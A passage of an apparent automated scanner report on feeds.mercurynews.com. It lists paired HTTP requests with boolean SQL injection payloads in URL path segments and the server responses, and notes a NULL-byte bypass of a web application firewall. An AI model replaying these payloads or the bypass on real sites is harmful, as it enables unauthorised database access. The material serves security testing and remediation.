Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet18682428'%20or%201%3d2--%20/568/200911.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:13 GMT Content-Length: 0 Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 11169924'%20or%201%3d1--%20 and 11169924'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet11169924'%20or%201%3d1--%20/568/200912.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:21:22 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet11169924'%20or%201%3d2--%20/568/200912.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:21:22 GMT Content-Length: 0 Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568%00'/200913.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 34 Date: Tue, 07 Dec 2010 23:21:53 GMT Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568%00''/200913.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:21:53 GMT Content-Length: 0 Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 64439849'%20or%201%3d1--%20 and 64439849'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56864439849'%20or%201%3d1--%20/200914.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:21:35 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/56864439849'%20or%201%3d2--%20/200914.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:21:36 GMT Content-Length: 0 Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200915.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:18 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200915.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:19 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200916.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:18:37 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200916.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:18:37 GMT Date: Tue, 07 Dec 2010 23:18:37 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet%00'/568/200916.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 34 Date: Tue, 07 Dec 2010 23:18:40 GMT Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet%00''/568/200916.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:18:40 GMT Content-Length: 0 Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 43065906'%20or%201%3d1--%20 and 43065906'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi43065906'%20or%201%3d1--%20/rss/CustomRssServlet/568/200917.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:21:54 GMT Date: Tue, 07 Dec 2010 23:21:54 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
Request 2
GET /mngi43065906'%20or%201%3d2--%20/rss/CustomRssServlet/568/200917.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:21:55 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200918.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:09 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200918.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:22:10 GMT Date: Tue, 07 Dec 2010 23:22:10 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 16674106'%20or%201%3d1--%20 and 16674106'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi16674106'%20or%201%3d1--%20/rss/CustomRssServlet/568/200922.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:21:21 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi16674106'%20or%201%3d2--%20/rss/CustomRssServlet/568/200922.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:21:21 GMT Date: Tue, 07 Dec 2010 23:21:21 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 14517237'%20or%201%3d1--%20 and 14517237'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss14517237'%20or%201%3d1--%20/CustomRssServlet/568/200922.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
Request 2
GET /mngi/rss14517237'%20or%201%3d2--%20/CustomRssServlet/568/200922.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:21:23 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200923.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:36 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
